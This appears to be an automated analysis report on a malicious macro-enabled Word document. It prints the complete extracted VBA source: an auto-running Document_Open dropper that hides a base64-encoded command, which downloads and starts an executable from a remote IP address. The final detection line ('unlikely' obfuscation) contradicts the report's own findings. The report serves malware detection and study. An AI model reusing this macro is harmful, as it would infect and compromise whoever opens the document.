Verdict: MALICIOUS
Risk Score: 210

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is an OOXML document containing VBA macros, including a Document_Open macro that triggers automatically and a critical heuristic for a potential Shell call. ClamAV signatures also identify the file as malware. The VBA script is a custom base64 decoder and deobfuscator: Document_Open concatenates short string fragments returned by dozens of wrapper functions, decodes the result, and passes it to Shell with a hidden window, likely to execute a downloaded payload.
Heuristics (5)

- ClamAV: Doc.Malware.Chronos-6897935-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
- VBA project inside OOXML (medium, OOXML_VBA, 2 related findings): Document contains a VBA project; VBA macros present
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): matched line in script:
      Shell Ymqabka(Igaze), 0
      End Sub
- Document_Open macro (low, OLE_VBA_DOCOPEN): matched line in script:
      Sub Document_Open()
      Dim Igaze As String
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the URLs below are standard OOXML/Office XML namespace identifiers found in the document text (OOXML body / shared strings):
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2006/wordml
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8179 bytes | d7864a783a2ead6f526749e82f994582eedfee9fec524011de4f2b30843f61a5 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function Ymqabka(Ogwoqoqk As String) As String
Dim Uqusuw() As Byte, Icsirvu() As Byte, Uxak(255) As Byte, Axor(63) As Long, Yjlalfe(63) As Long
Dim Ycong(63) As Long, Ifyba As Long, Upaqojn As Integer, Erokfix As Long, Ilirif As Long, Ikogyb As String
Dim Ucut As Long
Ogwoqoqk = Replace(Ogwoqoqk, vbCr, vbNullString)
Ogwoqoqk = Replace(Ogwoqoqk, vbLf, vbNullString)
Ucut = Len(Ogwoqoqk) Mod 4
If Ucut Then Exit Function
If InStrRev(Ogwoqoqk, Chr$(61) & Chr$(61)) Then
Upaqojn = 2
ElseIf InStrRev(Ogwoqoqk, Chr$(61)) Then
Upaqojn = 1
End If
For Ucut = 0 To 255
Select Case Ucut
Case 65 To 90
Uxak(Ucut) = Ucut - 65
Case 97 To 122
Uxak(Ucut) = Ucut - 71
Case 48 To 57
Uxak(Ucut) = Ucut + 4
Case 43
Uxak(Ucut) = 62
Case 47
Uxak(Ucut) = 63
End Select
Next Ucut
For Ucut = 0 To 63
Axor(Ucut) = Ucut * 64
Yjlalfe(Ucut) = Ucut * 4096
Ycong(Ucut) = Ucut * 262144
Next Ucut
Icsirvu = StrConv(Ogwoqoqk, vbFromUnicode)
ReDim Uqusuw((((UBound(Icsirvu) + 1) \ 4) * 3) - 1)
For Erokfix = 0 To UBound(Icsirvu) Step 4
Ifyba = Ycong(Uxak(Icsirvu(Erokfix))) + Yjlalfe(Uxak(Icsirvu(Erokfix + 1))) + _
Axor(Uxak(Icsirvu(Erokfix + 2))) + Uxak(Icsirvu(Erokfix + 3))
Ucut = Ifyba And 16711680
Uqusuw(Ilirif) = Ucut \ 65536
Ucut = Ifyba And 65280
Uqusuw(Ilirif + 1) = Ucut \ 256
Uqusuw(Ilirif + 2) = Ifyba And 255
Ilirif = Ilirif + 3
Next Erokfix
Ikogyb = StrConv(Uqusuw, vbUnicode)
If Upaqojn Then Ikogyb = Left$(Ikogyb, Len(Ikogyb) - Upaqojn)
Ymqabka = Ikogyb
End Function
Public Function Olecho(Ymeg As String)
Olecho = Yveblyb(Ymeg)
End Function
Public Function Yveblyb(Utavopz As String)
Yveblyb = Utavopz
End Function
Function UqkygUqkedqe() As String
UqkygUqkedqe = Olecho("Y2") & Olecho("1k") & Olecho("Lm") & Olecho("V4")
End Function
Function OkyxluzrUresi() As String
OkyxluzrUresi = Olecho("Z") & Olecho("S") & Olecho("A") & Olecho("v") & Olecho("Y") & Olecho("y") & Olecho("A") & Olecho("i")
End Function
Function UdgufhenYkiqzitb() As String
UdgufhenYkiqzitb = Olecho("d2") & Olecho("Fp") & Olecho("dG") & Olecho("Zv")
End Function
Function AfzinEcyjab() As String
AfzinEcyjab = Olecho("c") & Olecho("i") & Olecho("A") & Olecho("v") & Olecho("d") & Olecho("C") & Olecho("A") & Olecho("x")
End Function
Function AhasakzEjoju() As String
AhasakzEjoju = Olecho("M") & Olecho("S") & Olecho("B") & Olecho("P") & Olecho("c") & Olecho("G") & Olecho("l") & Olecho("w")
End Function
Function UhpycyznUxnejxu() As String
UhpycyznUxnejxu = Olecho("I") & Olecho("C") & Olecho("Y") & Olecho("g") & Olecho("Y") & Olecho("m") & Olecho("l") & Olecho("0")
End Function
Function OsexuElapo() As String
OsexuElapo = Olecho("c") & Olecho("2") & Olecho("F") & Olecho("k") & Olecho("b") & Olecho("W") & Olecho("l") & Olecho("u")
End Function
Function EqamrUtyzpe() As String
EqamrUtyzpe = Olecho("IC") & Olecho("90") & Olecho("cm") & Olecho("Fu")
End Function
Function EgwefAluvij() As String
EgwefAluvij = Olecho("c2") & Olecho("Zl") & Olecho("ci") & Olecho("BP")
End Function
Function IdyphatEgozi() As String
IdyphatEgozi = Olecho("d2") & Olecho("5p") & Olecho("d3") & Olecho("Eg")
End Function
Function EmuliUlaryn() As String
EmuliUlaryn = Olecho("L2") & Olecho("Rv") & Olecho("d2") & Olecho("5s")
End Function
Function EdytYfot() As String
EdytYfot = Olecho("b") & Olecho("2") & Olecho("F") & Olecho("k") & Olecho("I") & Olecho("C") & Olecho("9") & Olecho("w")
End Function
Function IjvihiOlasl() As String
IjvihiOlasl = Olecho("cm") & Olecho("lv") & Olecho("cm") & Olecho("l0")
End Function
Function EjisuOdnulef() As String
EjisuOdnulef = Olecho("eS") & Olecho("Bu") & Olecho("b3") & Olecho("Jt")
End Function
Function AnymugtAwym() As String
AnymugtAwym = Olecho("YW") & Olecho("wg") & Olecho("aH") & Olecho("R0")
End Function
Function IzirquAlufufw() As String
IzirquAlufufw = Olecho("c") & Olecho("D") & Olecho("o") & Olecho("v") & Olecho("L") & Olecho("z") & Olecho("M") & Olecho("x")
End Function
Function UxihiUbijef() As String
UxihiUbijef = Olecho("L") & Olecho("j") & Olecho("E") & Olecho("4") & Olecho("N") & Olecho("C") & Olecho("4") & Olecho("y")
End Function
Function AkibdednAdvico() As String
AkibdednAdvico = Olecho("M") & Olecho("z") & Olecho("Q") & Olecho("u") & Olecho("M") & Olecho("T") & Olecho("k") & Olecho("4")
End Function
Function AzrixOdicyq() As String
AzrixOdicyq = Olecho("L") & Olecho("2") & Olecho("1") & Olecho("v") & Olecho("Z") & Olecho("G") & Olecho("U") & Olecho("v")
End Function
Function AzjufOcuq() As String
AzjufOcuq = Olecho("Y") & Olecho("2") & Olecho("l") & Olecho("m") & Olecho("c") & Olecho("m") & Olecho("F") & Olecho("k")
End Function
Function YxocEcafaq() As String
YxocEcafaq = Olecho("by") & Olecho("9s") & Olecho("ZW") & Olecho("Fz")
End Function
Function EnizazUsinguz() As String
EnizazUsinguz = Olecho("Z") & Olecho("S") & Olecho("9") & Olecho("k") & Olecho("e") & Olecho("W") & Olecho("5") & Olecho("h")
End Function
Function OqeqinInqusunl() As String
OqeqinInqusunl = Olecho("ZG") & Olecho("8u") & Olecho("ZX") & Olecho("hl")
End Function
Function AwbiriAsitop() As String
AwbiriAsitop = Olecho("IC") & Olecho("Vh") & Olecho("cH") & Olecho("Bk")
End Function
Function AhihilEsar() As String
AhihilEsar = Olecho("YX") & Olecho("Rh") & Olecho("JV") & Olecho("xJ")
End Function
Function OnvetEjgiwohg() As String
OnvetEjgiwohg = Olecho("Z") & Olecho("n") & Olecho("R") & Olecho("v") & Olecho("c") & Olecho("n") & Olecho("E") & Olecho("u")
End Function
Function AlhidvelIqev() As String
AlhidvelIqev = Olecho("Z") & Olecho("X") & Olecho("h") & Olecho("l") & Olecho("I") & Olecho("C") & Olecho("Z") & Olecho("z")
End Function
Function YpojguqfAkirys() As String
YpojguqfAkirys = Olecho("d") & Olecho("G") & Olecho("F") & Olecho("y") & Olecho("d") & Olecho("C") & Olecho("A") & Olecho("l")
End Function
Function YwqasyzIfdec() As String
YwqasyzIfdec = Olecho("YX") & Olecho("Bw") & Olecho("ZG") & Olecho("F0")
End Function
Function OgtujOkaczyp() As String
OgtujOkaczyp = Olecho("Y") & Olecho("S") & Olecho("V") & Olecho("c") & Olecho("S") & Olecho("W") & Olecho("Z") & Olecho("0")
End Function
Function OkmexveEfmuzyq() As String
OkmexveEfmuzyq = Olecho("b3") & Olecho("Jx") & Olecho("Lm") & Olecho("V4")
End Function
Function UpuhAvzocl() As String
UpuhAvzocl = Olecho("ZS") & Olecho("I=")
End Function
Sub Document_Open()
Dim Igaze As String
Igaze = Igaze & UqkygUqkedqe() & OkyxluzrUresi() & UdgufhenYkiqzitb() & AfzinEcyjab()
Igaze = Igaze & AhasakzEjoju() & UhpycyznUxnejxu() & OsexuElapo() & EqamrUtyzpe()
Igaze = Igaze & EgwefAluvij() & IdyphatEgozi() & EmuliUlaryn() & EdytYfot()
Igaze = Igaze & IjvihiOlasl() & EjisuOdnulef() & AnymugtAwym() & IzirquAlufufw()
Igaze = Igaze & UxihiUbijef() & AkibdednAdvico() & AzrixOdicyq() & AzjufOcuq()
Igaze = Igaze & YxocEcafaq() & EnizazUsinguz() & OqeqinInqusunl() & AwbiriAsitop()
Igaze = Igaze & AhihilEsar() & OnvetEjgiwohg() & AlhidvelIqev() & YpojguqfAkirys()
Igaze = Igaze & YwqasyzIfdec() & OgtujOkaczyp() & OkmexveEfmuzyq() & UpuhAvzocl()
Shell Ymqabka(Igaze), 0
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{B5B69946-3EE8-4164-81F6-910CCD046E0B}{70450978-A9DE-4920-9982-9AF9762BB85D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 31232 bytes | eed7d3fca388e304f5fdb417ce12858963982755fcc84b3ad407a19806e7bc95 |

Detection:
- ClamAV: Doc.Malware.Chronos-6897935-0
- Obfuscation or payload: unlikely